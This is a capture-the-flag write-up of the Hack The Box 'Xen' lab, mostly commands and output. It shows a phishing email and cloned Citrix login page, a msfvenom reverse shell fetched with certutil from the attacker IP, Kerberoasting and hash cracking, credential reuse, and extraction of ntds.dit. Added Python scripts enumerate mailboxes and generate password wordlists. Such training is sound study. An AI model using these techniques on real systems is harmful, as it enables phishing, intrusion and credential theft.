# Xen

### Scope

{% code overflow="wrap" fullWidth="false" %}

```
Xen

By [egre55](https://app.hackthebox.com/home/users/profile/1190)

Humongous Retail operates a nationwide chain of stores.

The company has reacted to several recent skimming incidents by investing heavily in their POS systems. Keen to avoid any further negative publicity, they have engaged the services of a penetration testing company to assess the security of their perimeter and internal infrastructure.

Xen is designed to put your skills in enumeration, breakout, lateral movement, and privilege escalation to the test within a small Active Directory environment.

The goal is to gain a foothold on the internal network, escalate privileges and ultimately compromise the domain while collecting several flags along the way.

Entry Point: `10.13.38.12`
```

{% endcode %}

### Hosts

* 10.13.38.12

### Scans

```bash
# 10.13.38.12 - Port scan
sudo nmap -p- -T4 $IP --open -oN initial_.nmap
PORT    STATE SERVICE
25/tcp  open  smtp
80/tcp  open  http
443/tcp open  https

# 10.13.38.12 - Service scan
sudo nmap -p- -sV -sC $IP --open -oN service.nmap
PORT    STATE SERVICE  VERSION
25/tcp  open  smtp
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| fingerprint-strings: 
|   GenericLines, GetRequest: 
|     220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
|     sequence of commands
|     sequence of commands
|   Hello: 
|     220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
|     EHLO Invalid domain address.
|   Help: 
|     220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   NULL: 
|_    220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
80/tcp  open  http     Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Did not follow redirect to https://humongousretail.com/
| http-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: CITRIX
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: CITRIX.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
443/tcp open  ssl/http Microsoft IIS httpd 7.5
|_ssl-date: 2023-08-17T12:50:38+00:00; +11s from scanner time.
| ssl-cert: Subject: commonName=humongousretail.com
| Subject Alternative Name: DNS:humongousretail.com
| Not valid before: 2019-03-31T21:05:35
|_Not valid after:  2039-03-31T21:15:35
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_http-title: Did not follow redirect to https://humongousretail.com/
|_http-server-header: Microsoft-IIS/7.5

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

# WFUZZ
## Files
Target: http://humongousretail.com/FUZZ
Total requests: 37050
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000006:   200        13 L     170 W      1107 Ch     "LICENSE.txt"
000000069:   200        111 L    323 W      3433 Ch     "index.html"
000000379:   200        111 L    323 W      3433 Ch     "."
000000984:   200        2 L      12 W       97 Ch       "readme.txt"
000021775:   403        29 L     92 W       1233 Ch     "WEB-INF."               

## Directories
Target: http://humongousretail.com/FUZZ/
Total requests: 62284
=====================================================================
ID           Response   Lines    Word       Chars       Payload   
=====================================================================
000000015:   403        29 L     92 W       1233 Ch     "css"
000000009:   403        29 L     92 W       1233 Ch     "js"
000000002:   403        29 L     92 W       1233 Ch     "images"
000000056:   403        29 L     92 W       1233 Ch     "aspnet_client"
000000354:   403        29 L     92 W       1233 Ch     "WEB-INF"
000001059:   200        33 L     87 W       1158 Ch     "remote"
000001248:   403        29 L     92 W       1233 Ch     "META-INF"
000001705:   403        29 L     92 W       1233 Ch     "IMAGES"
000006484:   401        29 L     100 W      1293 Ch     "jakarta"

# Looking through the web pages found
curl http://humongousretail.com/readme.txt
A Pen created at CodePen.io. You can find this one at https://codepen.io/schlenges/pen/mXvvLW.

# The following require credentials
- http://humongousretail.com/jakarta/
- http://humongousretail.com/remote/

```

### Write-up

#### Foothold - 10.13.38.12

At the bottom of the 'humongousretail.com' website, the tester found that the organisation is hiring and that the contact address is 'jointheteam@humongousretail.com'.

<figure><img src="/files/zGbxNk1xvskKzyppmqzs" alt=""><figcaption></figcaption></figure>

This is useful for phishing later, as the page also names other departments (store, retail, sales and legal), which suggests likely mailbox names. Directory enumeration also revealed a Citrix XenApp login page at 'http://humongousretail.com/remote/auth/login.aspx', which requires valid credentials.

<figure><img src="/files/hACctn6PulM5ipCLOE87" alt=""><figcaption></figcaption></figure>

The SMTP service on port 25 could not be used to enumerate users with the Metasploit module, but 'smtp-user-enum' in RCPT mode worked: the server accepts 'RCPT TO' for an existing mailbox (250) and rejects it for an unknown one, so recipient addresses can be guessed without ever sending a message. Matching is case-insensitive, which is why both 'sales' and 'SALES' are reported below.

```bash
# Command
smtp-user-enum -U /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -D humongousretail.com -t 10.13.38.12 -m 50 -M RCPT

# Output
 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 50
Usernames file ........... /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt
Target count ............. 1
Username count ........... 21168
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ humongousretail.com

10.13.38.12: it@humongousretail.com exists
10.13.38.12: legal@humongousretail.com exists
10.13.38.12: marketing@humongousretail.com exists
10.13.38.12: sales@humongousretail.com exists
10.13.38.12: SALES@humongousretail.com exists
```
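To show what 'smtp-user-enum -M RCPT' does on the wire, here is an added Python example (not code from the original write-up) that performs the RCPT TO probe against a constructed in-process SMTP server. The fake server, its mailbox list and the probe list are made up for an offline run; the client half ('enumerate_rcpt') is what you would point at a real host.

```python
"""SMTP 'RCPT TO' user enumeration with a constructed in-process SMTP server.
Added example for this write-up; the fake server, its mailbox list and the
probe list are constructed for an offline run and are not from the target."""
import socket
import threading

# Constructed mailboxes the fake server will accept (compared case-insensitively,
# which is why a real run can report both 'sales' and 'SALES' as existing).
FAKE_MAILBOXES = {"it", "legal", "marketing", "sales"}
FAKE_DOMAIN = "humongousretail.com"


def _serve_one(conn):
    """Minimal SMTP responder: 250 for a known RCPT TO, 550 for unknown."""
    def reply(line):
        conn.sendall((line + "\r\n").encode())

    reply("220 ESMTP MAIL Service ready (constructed)")
    with conn.makefile("rb") as rd:
        for raw in rd:
            line = raw.decode(errors="replace").strip()
            verb = line.split(" ", 1)[0].split(":", 1)[0].upper()
            if verb in ("HELO", "EHLO"):
                reply("250 constructed.local Hello")
            elif verb == "MAIL":
                reply("250 2.1.0 Sender OK")
            elif verb == "RCPT":
                addr = line.split(":", 1)[1].strip().strip("<>")
                local, _, domain = addr.partition("@")
                if domain.lower() == FAKE_DOMAIN and local.lower() in FAKE_MAILBOXES:
                    reply("250 2.1.5 Recipient OK")
                else:
                    reply("550 5.1.1 User unknown")
            elif verb == "QUIT":
                reply("221 2.0.0 Bye")
                break
            else:
                reply("502 5.5.2 Command not implemented")
    conn.close()


def start_fake_smtp():
    """Start the fake server on 127.0.0.1 and return its ephemeral port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_serve_one, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def _reply_code(rd):
    """Read one SMTP reply (multi-line allowed) and return its numeric code."""
    while True:
        line = rd.readline().decode(errors="replace")
        if not line:
            raise ConnectionError("server closed the connection")
        if len(line) >= 4 and line[3] == " ":   # '250 ' ends the reply, '250-' continues it
            return int(line[:3])


def enumerate_rcpt(host, port, domain, candidates, sender="probe@example.com", timeout=5):
    """Return the candidates the server accepts as recipients.

    One MAIL FROM, then a RCPT TO per candidate; 250/251 means the mailbox
    exists, anything else (typically 550) means it does not. DATA is never
    sent, so no mail is delivered. Real servers cap recipients per transaction,
    so reconnect in batches for long wordlists (smtp-user-enum does this for you).
    """
    found = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        rd = s.makefile("rb")

        def cmd(line):
            s.sendall((line + "\r\n").encode())
            return _reply_code(rd)

        if _reply_code(rd) != 220:
            raise ConnectionError("no SMTP banner")
        if cmd("EHLO enum.local") != 250:
            raise ConnectionError("EHLO rejected")
        if cmd(f"MAIL FROM:<{sender}>") != 250:
            raise ConnectionError("MAIL FROM rejected")
        for user in candidates:
            if cmd(f"RCPT TO:<{user}@{domain}>") in (250, 251):
                found.append(user)
        cmd("QUIT")
    return found


if __name__ == "__main__":
    port = start_fake_smtp()
    probes = ["it", "legal", "sales", "SALES", "store", "retail", "jointheteam"]
    print(enumerate_rcpt("127.0.0.1", port, FAKE_DOMAIN, probes))
```

Against a real target, replace the fake server with the host and port 25 and feed a wordlist to 'enumerate_rcpt'; a server that answers 250 to every RCPT TO (catch-all) makes this mode useless, so check a known-bogus name first.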

The tester used the Social-Engineer Toolkit (SET) to clone the Citrix XenApp login page and phish for valid credentials.

```bash
# Commands
sudo setoolkit
1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner
10.10.14.6
https://humongousretail.com/remote/auth/login.aspx

## Fake Email - email.txt
Hello everyone,

Citrix Xen App has been updated.
Please verify you can login:
http://10.10.14.6/remote/auth/login.aspx

If there are any issues, we'll send a follow up email on how to report them.

Kind regards,
IT Team

# Use swaks to automate the email sent - retail and store did not exist
swaks --to sales@humongousretail.com --from it@humongousretail.com --server 10.13.38.12 --port 25 --body email.txt
swaks --to legal@humongousretail.com --from it@humongousretail.com --server 10.13.38.12 --port 25 --body email.txt
swaks --to jointheteam@humongousretail.com --from it@humongousretail.com --server 10.13.38.12 --port 25 --body email.txt
```

A couple of users were phished successfully.

<figure><img src="/files/k2GydYTtkiUEphfW2Twx" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/lq0ByzI0oDHeatEPpkpI" alt=""><figcaption></figcaption></figure>

Using the harvested credentials, logging into the Citrix portal was successful.

<figure><img src="/files/Bs3UvJes9NVFghqRjRQ3" alt=""><figcaption></figcaption></figure>

Launching the published application requires the Citrix Receiver (ICA client) on the attacking machine, so the tester installed it.

```bash
# Citrix receiver
https://www.citrix.com/downloads/citrix-receiver/linux/receiver-for-linux-latest.html
# Install
dpkg -i icaclientWeb_13.10.0.20_amd64.deb
```

<figure><img src="/files/xsc1XN0i4kNixcziF3W6" alt=""><figcaption></figcaption></figure>

The environment was restricted and blocked a lot of the usual functionality (Explorer, cmd and the like).

<figure><img src="/files/Epw8uzdRaTx5R7bGShFE" alt=""><figcaption></figcaption></figure>

The tester created the following executable, which simply spawns a cmd window, and hosted it on an SMB share.

```bash
## hello.c 
#include <stdlib.h>

int main() {
	system("C:\\Windows\\System32\\cmd.exe");
}

# Compile into an executable
x86_64-w64-mingw32-gcc hello.c -o hello.exe

# Host it on an smbshare
impacket-smbserver share . -smb2support
```

It was not possible to reach the SMB share directly from File Explorer.

<figure><img src="/files/A0eLPEL4oXsiLqmR1YKl" alt=""><figcaption></figcaption></figure>

However, browsing to the share from within an application (rather than Explorer) worked.

<figure><img src="/files/HSiwCw1qmgKWtcjP3muP" alt=""><figcaption></figcaption></figure>

Right-clicking the binary and running it spawned a cmd shell. Creating a shortcut to it was another way.

<figure><img src="/files/PgI6aPhv28BJaZxMwOTL" alt=""><figcaption></figcaption></figure>

The tester then generated a Meterpreter payload and transferred it across.

```bash
# Meterpreter shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe -o reverse.exe

# Transfering across
mkdir C:\Users\Public\temp && cd C:\Users\Public\temp
certutil.exe -urlcache -split -f "http://10.10.14.6/reverse.exe" r.exe
```

A Meterpreter session was received.

<figure><img src="/files/uTkkDqAlPJVm5V8vCPUr" alt=""><figcaption></figcaption></figure>

#### Privilege Escalation - 10.13.38.12

The tester transferred a few tools across to enumerate the desktop.

```bash
# Using meterpreter shell
upload PowerUp.ps1

# Using citrix window
powershell -ep bypass

# Import module 
Import-module .\PowerUp.ps1
Invoke-AllChecks
```

<figure><img src="/files/drjxaKwuiGdN9XlxYdpX" alt=""><figcaption></figcaption></figure>

As shown above, the 'AlwaysInstallElevated' policy is enabled. When 'HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated' and the matching value under 'HKCU' are both set to 1, Windows Installer runs any MSI package a standard user installs with SYSTEM privileges (both values must be 1 for the policy to take effect, which is what PowerUp and the Metasploit module check). The tester used this to obtain a SYSTEM shell.

```bash
# Metasploit
use exploit/windows/local/always_install_elevated
set session 1
set lhost 10.10.14.6
run
```

<figure><img src="/files/0ICmlFdb9gB98kzzNbEg" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/WJxmeZ8VJrMUdo5YiYg0" alt=""><figcaption></figcaption></figure>

#### Domain - Lateral Movement

Domain enumeration was done with PowerView ('PowerView.ps1').

```bash
# Computers + nslookup added the IPs to each one
Get-DomainComputer | Select Name
name                                                                           
----                                                                           
DC               172.16.249.200
CITRIX           172.16.249.201
VDESKTOP3        172.16.249.205
VDESKTOP2        172.16.249.204
VDESKTOP1        172.16.249.203    
LAPTOP1                                                                        
LAPTOP2                                                                        
LAPTOP3                                                                        
LAPTOP5                                                                        
LAPTOP6                                                                        
WK01                                                                           
WK02                                                                           
WK03                                                                           
WK04                                                                           
WK05                                                                           
WK06                                                                           
WK07                                                                           
WK09

# Shares
Invoke-ShareFinder
Name                               Type Remark              ComputerName
----                               ---- ------              ------------
ADMIN$                       2147483648 Remote Admin        DC.htb.local
C$                           2147483648 Default share       DC.htb.local
IPC$                         2147483651 Remote IPC          DC.htb.local
NETLOGON                              0 Logon server share  DC.htb.local
SYSVOL                                0 Logon server share  DC.htb.local
ADMIN$                       2147483648 Remote Admin        CITRIX.htb.local
C$                           2147483648 Default share       CITRIX.htb.local
Citrix$                               0                     CITRIX.htb.local
IPC$                         2147483651 Remote IPC          CITRIX.htb.local
ISOs                                  0                     CITRIX.htb.local
ISOs-TEST                             0                     CITRIX.htb.local
ADMIN$                       2147483648 Remote Admin        VDESKTOP3.htb.local
C$                           2147483648 Default share       VDESKTOP3.htb.local
IPC$                         2147483651 Remote IPC          VDESKTOP3.htb.local

# Users + Service Princiapls
get-DomainUser | Select Name, SamAccountName, ServicePrincipalName
name                       samaccountname     ServicePrincipalName
----                       --------------     --------------------
Administrator              Administrator
Guest                      Guest
krbtgt                     krbtgt             kadmin/changepw
Adam Larsson               alarsson
Juan Mendes                jmendes
Paul Morgan                pmorgan
Anita Wardel               awardel
xenserver-svc              xenserver-svc
print-svc                  print-svc
mssql-svc                  mssql-svc
Mark Turner                mturner            MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433
app-svc                    app-svc
Rajesh Prakash             rprakash
Isla Urquart               urquarti
Rosie Drew                 rdrew
Francois Boucher           fboucher
Christina Meller           cmeller
Andrei Nagy                anagy
backup-svc                 backup-svc
test-svc                   test-svc
netscaler-svc              netscaler-svc

# Users + Admincount
get-netuser | Select samaccountname,admincount
samaccountname                                                       admincount
--------------                                                       ----------
Administrator                                                                 1
Guest
krbtgt                                                                        1
alarsson
jmendes
pmorgan
awardel
xenserver-svc
print-svc                                                                     1
mssql-svc
mturner
app-svc
rprakash
urquarti
rdrew
fboucher
cmeller
anagy
backup-svc                                                                    1
test-svc
netscaler-svc
```

The tester then tried to access the shares found, but the current user did not have access.

```bash
# Commands
net view \\citrix\citrix$\
net view \\citrix\ISOs
net view \\citrix\ISOs-TEST 
```

<figure><img src="/files/XdfmerHYPfzOpQs4Mvnl" alt=""><figcaption></figcaption></figure>

As executables weren't working on the machine, the tester used PowerView's 'Invoke-Kerberoast' to request service tickets for accounts with SPNs (here 'mturner', whose MSSQLSvc SPN was listed above).

```bash
# Command
Invoke-Kerberoast
```

<figure><img src="/files/2YaXuPyTQFIfnRuKRgiZ" alt=""><figcaption></figcaption></figure>

It was also possible to pivot through the Meterpreter session with a SOCKS proxy and run Impacket from the attacking machine.

```bash
# Command
route add 172.16.249.0/24 8
use server/socks_proxy
start

# Impacket
proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.249.200 HTB.LOCAL/pmorgan:Summxxxxxxxxxxxxx -save -outputfile GetUserSPNs.out
```

<figure><img src="/files/eho8eeEUiHapeQCeRREE" alt=""><figcaption></figcaption></figure>

Once the hash was copied to a file and all whitespace removed (PowerShell wraps long output, and hashcat rejects a hash with a line break inside it), 'hashcat' was used to crack it in mode 13100 (Kerberos 5 TGS-REP, etype 23).

```bash
# Get rid of spaces
cat mturner.out | tr -d '[:space:]' > mturner.hash
# Command
sudo hashcat -a 0 -m 13100 mturner.hash /usr/share/wordlists/rockyou.txt --force

# Adding rules
sudo hashcat -a 0 -m 13100 mturner.hash rockyou.txt -r OneRuleToRuleThemAll.rule --force
sudo hashcat -a 0 -m 13100 mturner.hash rockyou.txt -r d3ad0ne.rule --force
```
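The whitespace clean-up above matters more than it looks: a line break or stray space inside the hash makes hashcat reject the line. As an added Python example (not from the original write-up), the helper below strips the whitespace and checks the structure of a 13100 hash before it is handed to hashcat, so a mangled paste fails with a precise reason. The sample hash is constructed from dummy hex (user, realm and SPN follow the write-up; checksum and encrypted data are not real ticket material).

```python
"""Normalise and sanity-check a Kerberos 5 TGS-REP etype 23 hash (hashcat -m 13100).
Added example for this write-up; the sample below is constructed from dummy hex."""
import re
import textwrap

# Constructed sample: user/realm/SPN as reported in the write-up, checksum and
# encrypted data are dummy hex, wrapped across lines as PowerShell output would be.
_DUMMY_CKSUM = "0123456789abcdef" * 2                      # 16 bytes -> 32 hex chars
_DUMMY_EDATA = "".join(f"{i % 256:02x}" for i in range(300))
WRAPPED_SAMPLE = textwrap.fill(
    "$krb5tgs$23$*mturner$HTB.LOCAL$MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433*$"
    f"{_DUMMY_CKSUM}${_DUMMY_EDATA}",
    width=76,
)


def normalize_krb5tgs(text):
    """Remove all whitespace (line wraps, trailing spaces, CR/LF) from a pasted hash."""
    return re.sub(r"\s+", "", text)


def parse_krb5tgs(hash_line):
    """Split '$krb5tgs$<etype>$*user$realm$spn*$checksum$edata' and validate each field.

    Raises ValueError with the reason, which is more useful than hashcat's
    generic rejection when a paste has been mangled.
    """
    if not hash_line.startswith("$krb5tgs$"):
        raise ValueError("missing $krb5tgs$ prefix")
    _, _, etype, rest = hash_line.split("$", 3)
    if etype != "23":
        raise ValueError(f"etype {etype} is not RC4 (23); AES tickets use -m 19600/19700")
    if not rest.startswith("*") or "*$" not in rest:
        raise ValueError("label block *user$realm$spn* is malformed")
    label, _, tail = rest[1:].partition("*$")
    user, realm, spn = label.split("$", 2)
    checksum, _, edata = tail.partition("$")
    if not re.fullmatch(r"[0-9a-fA-F]{32}", checksum):
        raise ValueError("checksum must be 32 hex chars (16-byte HMAC-MD5)")
    if not re.fullmatch(r"[0-9a-fA-F]+", edata) or len(edata) % 2:
        raise ValueError("encrypted data is not an even-length hex string")
    return {
        "etype": int(etype),
        "user": user,
        "realm": realm,
        "spn": spn,
        "checksum": checksum.lower(),
        "edata_len": len(edata) // 2,      # bytes of RC4-encrypted ticket data
    }


if __name__ == "__main__":
    clean = normalize_krb5tgs(WRAPPED_SAMPLE)
    print(parse_krb5tgs(clean))
```

Run 'normalize_krb5tgs' over each pasted line and feed the output to hashcat; if 'parse_krb5tgs' reports a non-23 etype, the account has AES-only Kerberos encryption and the TGS-REP must be cracked with the AES modes instead.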

<figure><img src="/files/3Zbq3SKuKYpQVJm0I5Dr" alt=""><figcaption></figcaption></figure>

The tester then tried to access the shares found earlier with the new credentials.

```bash
# Connect to share
net use \\citrix\citrix$ /u:mturner 4i*******
```

<figure><img src="/files/WIToHgnAgjdxcyqG4iE3" alt=""><figcaption></figcaption></figure>

Once connected, the most interesting file was 'private.ppk'; the tester copied it and transferred it to the attacking machine.

```bash
# Command
cat private.ppk       
PuTTY-User-Key-File-2: ssh-rsa
Encryption: aes256-cbc
Comment: imported-openssh-key
Public-Lines: 6
```

'private.ppk' is a PuTTY-format SSH private key, and the 'Encryption: aes256-cbc' header shows it is protected by a passphrase. The internal network was scanned for open SSH ports.

<figure><img src="/files/ayXaGDZCLEepO0RT3Dlj" alt=""><figcaption></figcaption></figure>

Connecting to the 172.16.249.202 host on port 22 opens a NetScaler command line interface.

```bash
# Command
proxychains -q ssh mturner@172.16.249.202
```

<figure><img src="/files/TCK7syTv1lJc4vxzdsy8" alt=""><figcaption></figcaption></figure>

However, 'mturner' was not allowed to run the 'shell' command. The tester then converted the key and set about cracking its passphrase.

```bash
# Command
puttygen private.ppk -O private-openssh -o private.pem
# Password required

# Using john to crack
putty2john private.ppk > ppk.hash
# No wordlist worked; searching online led to kwprocessor, a keyboard-walk generator
./kwp basechars/full.base keymaps/en.keymap routes/2-to-16-max-3-direction-changes.route > keyboard_walks-2-to-16-3-direction

# Crack with john
john --wordlist=./keyboard_walks-2-to-16-3-direction ppk.hash
```

<figure><img src="/files/jYV8spSCGwWrK9LNctiG" alt=""><figcaption></figcaption></figure>
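What kwprocessor generates, shown as an added Python example (not the write-up's code and not kwprocessor's own): a generator of keyboard walks over a simplified, column-aligned US QWERTY grid, bounded by length and by the number of direction changes, which is enough to reproduce classic walks such as '1qaz', 'zaq1' and 'qwerty'. The grid and the eight-direction move set are my own simplification of what kwp's keymap and route files describe; shifted characters are left out.

```python
"""Keyboard-walk wordlist generator, in the spirit of kwprocessor.
Added example for this write-up; the grid below is a simplified, column-aligned
US QWERTY layout (no shifted characters), not kwp's own keymap file."""

# Rows are aligned so that a straight vertical move gives the classic walk 1-q-a-z.
QWERTY = [
    "1234567890",
    "qwertyuiop",
    "asdfghjkl",
    "zxcvbnm",
]

# (row delta, column delta) for the 8 compass directions.
DIRECTIONS = [(-1, 0), (1, 0), (0, -1), (0, 1), (-1, -1), (-1, 1), (1, -1), (1, 1)]


def keyboard_walks(min_len, max_len, max_changes, grid=QWERTY, directions=DIRECTIONS):
    """Return the set of walks whose length is in [min_len, max_len] and whose
    direction changes (consecutive moves in different directions) do not exceed
    max_changes. Keys may be revisited, as in 'qwqw'."""
    position = {ch: (r, c) for r, row in enumerate(grid) for c, ch in enumerate(row)}
    walks = set()

    def key_at(r, c):
        if 0 <= r < len(grid) and 0 <= c < len(grid[r]):
            return grid[r][c]
        return None

    def extend(path, last_dir, changes):
        if len(path) >= min_len:
            walks.add("".join(path))
        if len(path) == max_len:
            return
        r, c = position[path[-1]]
        for d in directions:
            nxt = key_at(r + d[0], c + d[1])
            if nxt is None:
                continue
            n_changes = changes + (1 if last_dir is not None and d != last_dir else 0)
            if n_changes > max_changes:
                continue
            path.append(nxt)
            extend(path, d, n_changes)
            path.pop()

    for start in position:
        extend([start], None, 0)
    return walks


def direction_changes(walk, grid=QWERTY):
    """Number of direction changes in a walk, or None if it is not a walk on the grid."""
    position = {ch: (r, c) for r, row in enumerate(grid) for c, ch in enumerate(row)}
    changes, last = 0, None
    for a, b in zip(walk, walk[1:]):
        if a not in position or b not in position:
            return None
        d = (position[b][0] - position[a][0], position[b][1] - position[a][1])
        if d not in DIRECTIONS:
            return None
        if last is not None and d != last:
            changes += 1
        last = d
    return changes


if __name__ == "__main__":
    # Write a small wordlist for john/hashcat: 4 to 8 keys, at most 2 direction changes.
    for w in sorted(keyboard_walks(4, 8, 2)):
        print(w)
```

Redirect the output to a file and pass it to 'john --wordlist=' as the write-up does with the kwp output; raising 'max_changes' or 'max_len' grows the list quickly, so start narrow and widen only if nothing cracks.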

The default NetScaler administrative account is 'nsroot', and the cracked key authenticated as that user.

```bash
# Command
proxychains -q ssh nsroot@172.16.249.202 -i private.pem
```

<figure><img src="/files/pJYIceijomzxHDlkXkot" alt=""><figcaption></figcaption></figure>

Within the root directory there was an interesting packet capture; 'scp' was used to copy it to the attacking machine.

<figure><img src="/files/xjlb03LZdfJPQVnL70Mx" alt=""><figcaption></figcaption></figure>

```bash
# Command
proxychains -q scp -i ./private.pem nsroot@172.16.249.202:/root/capture.cap .
```

Analysing the capture file in Wireshark showed several interesting packets.

<figure><img src="/files/8y1Jg4wZGKLcykaj15gv" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/NqRL16xpOi03Oh78sOzi" alt=""><figcaption></figcaption></figure>

The capture revealed a user login over HTTP on port 80 in cleartext, and the service account 'netscaler-svc' performing an LDAP simple bind, which also carries the password in cleartext. The tester then checked for password reuse across all the accounts enumerated earlier.

```bash
# Command
proxychains -q crackmapexec smb 172.16.249.200 -u ./users.txt -p '#S3r********' --continue-on-success
```

<figure><img src="/files/3fI8ozkipaGATpPkuHSS" alt=""><figcaption></figcaption></figure>
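Why an LDAP simple bind on port 389 gives up the password: the BindRequest carries the DN and the password as plain BER octet strings, so anyone with the capture can decode them with a few lines of ASN.1 parsing. The following is an added Python example (not the write-up's code) that decodes a simple bind from raw bytes and returns nothing for a SASL bind, where the credentials are not in the clear. The sample request is constructed here with the write-up's account name and a placeholder password, not bytes from the real capture.

```python
"""Decode an LDAP simple BindRequest from raw bytes, as seen in a cleartext
port-389 capture. Added example for this write-up; the sample bind below is
constructed (the account name follows the write-up, the password is a placeholder)."""


def _tlv(buf, i):
    """Read one BER tag-length-value at offset i; return (tag, value, next_offset)."""
    tag = buf[i]
    length = buf[i + 1]
    i += 2
    if length & 0x80:                        # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[i:i + n], "big")
        i += n
    return tag, buf[i:i + length], i + length


def parse_simple_bind(packet):
    """Return {'message_id', 'version', 'name', 'password'} for a simple bind,
    or None if the message is not a BindRequest or uses SASL (no cleartext password)."""
    tag, message, _ = _tlv(packet, 0)
    if tag != 0x30:                          # LDAPMessage ::= SEQUENCE
        raise ValueError("not a BER SEQUENCE")
    tag, msg_id, i = _tlv(message, 0)
    if tag != 0x02:                          # messageID INTEGER
        raise ValueError("missing messageID")
    tag, bind, _ = _tlv(message, i)
    if tag != 0x60:                          # [APPLICATION 0] BindRequest
        return None
    _, version, j = _tlv(bind, 0)            # version INTEGER
    _, name, j = _tlv(bind, j)               # name LDAPDN (OCTET STRING)
    tag, cred, _ = _tlv(bind, j)             # authentication CHOICE
    if tag != 0x80:                          # [0] simple OCTET STRING; 0xA3 would be SASL
        return None
    return {
        "message_id": int.from_bytes(msg_id, "big"),
        "version": int.from_bytes(version, "big"),
        "name": name.decode("utf-8", errors="replace"),
        "password": cred.decode("utf-8", errors="replace"),
    }


def _ber(tag, content):
    """Encode one TLV with a short or long definite length."""
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + content


def build_simple_bind(message_id, name, password, version=3):
    """Encode a simple BindRequest (small integer values only); used here to
    construct sample traffic for the decoder."""
    bind = _ber(0x02, bytes([version])) + _ber(0x04, name.encode()) + _ber(0x80, password.encode())
    return _ber(0x30, _ber(0x02, bytes([message_id])) + _ber(0x60, bind))


# Constructed sample: the write-up's service account name with a placeholder password.
SAMPLE_BIND = build_simple_bind(1, "netscaler-svc@htb.local", "ConstructedPlaceholder1")

if __name__ == "__main__":
    print(parse_simple_bind(SAMPLE_BIND))
```

To apply this to a real capture, extract the TCP payloads to port 389 (for example with 'tshark -T fields -e tcp.payload') and run 'parse_simple_bind' over each one; LDAPS (636) or LDAP with StartTLS would leave nothing readable here, which is the point of the recommendation below.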

The results showed that all the service accounts reused the same password, 'backup-svc' among them. The tester then checked whether the DC exposed any ports that would allow a remote session.

```bash
# Command
proxychains -q nmap -sT -p 3389,5985,5986  172.16.249.200 -oN dc.nmap
# Output
PORT     STATE  SERVICE
3389/tcp open   ms-wbt-server
5985/tcp open   wsman
5986/tcp closed wsmans
```

'Xfreerdp' was used to RDP into the DC using the backup service account.

```bash
# Command
proxychains -q xfreerdp /u:backup-svc /p:#S3r******** /w:1366 /h:768 /v:172.16.249.200
```

<figure><img src="/files/vvcwHb2lOo3HsH0YWrip" alt=""><figcaption></figcaption></figure>

#### Domain - Privilege Escalation

<figure><img src="/files/9HuCGcfEF6CQk3DgXRQp" alt=""><figcaption></figcaption></figure>

Checking the account's privileges, the tester found that the backup service account holds 'SeBackupPrivilege' and 'SeRestorePrivilege', which allow reading and writing any file on the system regardless of its ACL.\
To make file exfiltration easier, the tester logged in with 'evil-winrm' instead; in that session the privileges also showed as enabled.

```bash
# Command
proxychains -q evil-winrm -i 172.16.249.200 -u backup-svc -p '#S3r********'
```

The tester then saved the SAM and SYSTEM registry hives locally and transferred them to the attacking machine with 'evil-winrm'.

```bash
# Commands
reg save HKLM\SYSTEM SYSTEM.hive
reg save HKLM\SAM SAM.hive
download SYSTEM.hive
download SAM.hive
```

Copying 'ntds.dit' directly failed because the file is locked while the directory service is running. Instead, the tester used 'diskshadow' to create a volume shadow copy and copied the file from there. 'diskshadow' could not be used interactively in the remote session, so a script was written locally and transferred across.

```bash
## copyScript.txt
set verbose on
set metadata C:\Users\backup-svc\Documents\temp\mata.cab
set context persistent nowriters
add volume c: alias hacked
create
expose %hacked% h:
exec "C:\\Users\\backup-svc\\Documents\\temp\\copyNTDS.cmd"
delete shadows volume %hacked%
reset
exit

## copyNTDS.cmd
# /B = backup mode: uses SeBackupPrivilege to read the file regardless of its ACL
cmd.exe /c robocopy /B h:\windows\ntds\ C:\Users\backup-svc\Documents\temp\ ntds.dit

# Ensure CRLF line endings, otherwise diskshadow will not parse the script
unix2dos copyScript.txt
